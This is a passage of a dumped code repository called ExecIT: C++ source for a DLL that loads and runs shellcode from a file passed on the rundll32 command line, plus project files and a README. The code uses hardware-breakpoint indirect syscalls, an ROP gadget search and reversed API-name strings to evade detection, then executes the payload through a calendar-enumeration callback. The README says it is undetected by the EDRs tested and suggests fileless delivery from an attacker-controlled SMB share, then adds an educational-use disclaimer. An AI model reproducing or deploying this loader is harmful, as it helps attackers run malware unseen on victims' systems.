ExceptionInfo->ContextRecord->Rax = syscallNumber;\n                //Set RIP to syscall;ret; opcode address\n                ExceptionInfo->ContextRecord->Rip = syscallReturnAddress;\n\n            }\n\n            // Move breakpoint back to PrepareSyscall to catch the next invoke\n            ExceptionInfo->ContextRecord->Dr0 = (UINT64)&PrepareSyscall;\n\n\n        }\n        return EXCEPTION_CONTINUE_EXECUTION;\n    }\n    return EXCEPTION_CONTINUE_SEARCH;\n}\n\nbool FindRetGadget() {\n    // Dynamically search for a suitable \"ADD RSP,68;RET\" gadget in both kernel32 and kernelbase\n    retGadgetAddress = FindInModule(\"kernel32.dll\", (PBYTE)\"\\x48\\x83\\xC4\\x68\\xC3\", (PCHAR)\"xxxxx\");\n    if (retGadgetAddress != 0) {\n        return true;\n    }\n    else {\n        reverseStr2(kernelbase, SIZEOF(kernelbase));\n        retGadgetAddress = FindInModule(kernelbase, (PBYTE)\"\\x48\\x83\\xC4\\x68\\xC3\", (PCHAR)\"xxxxx\");\n        if (retGadgetAddress != 0) {\n            return true;\n        }\n    }\n    return false;\n}\n\nbool InitHWSyscalls() {\n    myThread = GetCurrentThread();\n    hNtdll = (HANDLE)GetModuleAddress((LPWSTR)L\"ntd\");\n\n    if (!FindRetGadget()) {\n        return false;\n    }\n\n    // Register exception handler\n    exceptionHandlerHandle = AddVectoredExceptionHandler(1, &HWSyscallExceptionHandler);\n\n    if (!exceptionHandlerHandle) {\n        return false;\n    }\n\n    return SetMainBreakpoint();\n}\n\nbool DeinitHWSyscalls() {\n    return RemoveVectoredExceptionHandler(exceptionHandlerHandle) != 0;\n}\n\n\n\n\nextern \"C\" __declspec(dllexport)  void WINAPI HelperFunc(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)\n{\n    OutputDebugStringA(\"HelperFunc was executed\");\n    OutputDebugStringA(lpszCmdLine);\n    InitHWSyscalls();\n    char cNtReadFile[] = \"eliFdaeRtN\";\n    char cNtProtectVirtualMemory[] = \"yromeMlautriVtcetorPtN\";\n    LPVOID payload = NULL;\n    HANDLE hFile;\n    SIZE_T payload_len;\n\n    hFile = CreateFileA(lpszCmdLine, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);\n    if (hFile == INVALID_HANDLE_VALUE) {\n        return;\n    }\n    OutputDebugStringA(\"Opened File!\");\n    payload_len = GetFileSize(hFile, NULL);\n    if (payload_len == 0) {\n        return;\n    }\n    OutputDebugStringA(\"Got file Size\");\n\n    HANDLE hThread = NULL;\n\n    HANDLE hproc = (HANDLE)-1; //handle to current process\n\n\n\n\n    reverseStr(cNtAllocateVirtualMemory, SIZEOF(cNtAllocateVirtualMemory));\n    NtAllocateVirtualMemory_t allocvirtualmemory = (NtAllocateVirtualMemory_t)PrepareSyscall((char*)cNtAllocateVirtualMemory);\n    allocvirtualmemory(hproc, &payload, 0, (PULONG)&payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n    OutputDebugStringA(\"Alocated memory\");\n\n    IO_STATUS_BLOCK ioBlock;\n    reverseStr(cNtReadFile, SIZEOF(cNtReadFile));\n    NtReadFile_t readfile = (NtReadFile_t)PrepareSyscall((char*)cNtReadFile);\n    readfile(hFile, NULL, NULL, NULL, &ioBlock, payload, (DWORD)payload_len, NULL, NULL);\n\n    DWORD oldAccess = PAGE_READWRITE;\n    reverseStr(cNtProtectVirtualMemory, SIZEOF(cNtProtectVirtualMemory));\n    NtProtectVirtualMemory_t protectmemory = (NtProtectVirtualMemory_t)PrepareSyscall((char*)cNtProtectVirtualMemory);\n    protectmemory(hproc, (PVOID*)&payload, (PULONG)&payload_len, PAGE_EXECUTE_READ, &oldAccess);\n\n    ::EnumCalendarInfoEx((CALINFO_ENUMPROCEX)payload, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1);\n\n    DeinitHWSyscalls();\n\n    Sleep(50000);\n}\n\nBOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)\n{\n    switch (fdwReason)\n    {\n    case DLL_PROCESS_ATTACH:\n        OutputDebugStringA(\"DllMain\");\n        break;\n    case DLL_PROCESS_DETACH:\n    case DLL_THREAD_ATTACH:\n    case DLL_THREAD_DETACH:\n        break;\n    }\n\n    return TRUE;\n}\n\n"
  },
  {
    "path": "ExecIT/framework.h",
    "content": "#pragma once\n\n//#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers\n// Windows Header Files\n#include <windows.h>\n"
  },
  {
    "path": "ExecIT/pch.cpp",
    "content": "// pch.cpp: source file corresponding to the pre-compiled header\n\n#include \"pch.h\"\n\n// When you are using pre-compiled headers, this source file is necessary for compilation to succeed.\n"
  },
  {
    "path": "ExecIT/pch.h",
    "content": "// pch.h: This is a precompiled header file.\n// Files listed below are compiled only once, improving build performance for future builds.\n// This also affects IntelliSense performance, including code completion and many code browsing features.\n// However, files listed here are ALL re-compiled if any one of them is updated between builds.\n// Do not add files here that you will be updating frequently as this negates the performance advantage.\n\n#ifndef PCH_H\n#define PCH_H\n\n// add headers that you want to pre-compile here\n#include \"framework.h\"\n//#include \"HWSyscalls.h\"\n#include <iostream>\n#include <fstream>\n#include <inttypes.h>\n#endif //PCH_H\n"
  },
  {
    "path": "ExecIT/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by ProjectName.rc\n//\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE        102\n#define _APS_NEXT_COMMAND_VALUE         40001\n#define _APS_NEXT_CONTROL_VALUE         1000\n#define _APS_NEXT_SYMED_VALUE           101\n#endif\n#endif\n"
  },
  {
    "path": "ExecIT.sln",
    "content": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 17\nVisualStudioVersion = 17.5.33502.453\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"ExecIT\", \"ExecIT\\ExecIT.vcxproj\", \"{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|x64 = Debug|x64\n\t\tDebug|x86 = Debug|x86\n\t\tRelease|x64 = Release|x64\n\t\tRelease|x86 = Release|x86\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Debug|x64.Build.0 = Debug|x64\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Debug|x86.Build.0 = Debug|Win32\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Release|x64.ActiveCfg = Release|x64\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Release|x64.Build.0 = Release|x64\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Release|x86.ActiveCfg = Release|Win32\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Release|x86.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {99BD5419-6E81-4800-BB0D-91971A7E0639}\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "README.md",
    "content": "# ExecIT\n\n## Description\nDLL Shellcode self-inyector/runner based on HWSyscalls, ideally thought to be executed with rundll32. May grant fileless execution if victim endpoint has access to attacker-controlled SMB share.\n\n## Usage\n```powershell\nrundll32.exe ExecIT.dll, HelperFunc, <path_to_file>\n```\n\n![poc](https://github.com/florylsk/ExecIT/assets/46110263/f4f13590-3ba7-45c3-a6a4-034f43b366a1)\n\n\n## Detection\n\nCurrently it is fully undetected across all EDRs tested (depending on the shellcode) as of this commit.\n\nE.g., for Defender for Endpoint EDR:\n\n\n![image](https://github.com/florylsk/ExecIT/assets/46110263/a967f39b-027c-4bfa-b867-f6ec955ff54f)\n\n## Disclaimer\n\nThe information/files provided in this repository are strictly intended for educational and ethical purposes only. The techniques and tools are intended to be used in a lawful and responsible manner, with the explicit consent of the target system's owner. Any unauthorized or malicious use of these techniques and tools is strictly prohibited and may result in legal consequences. I am not responsible for any damages or legal issues that may arise from the misuse of the information provided.\n"
  }
]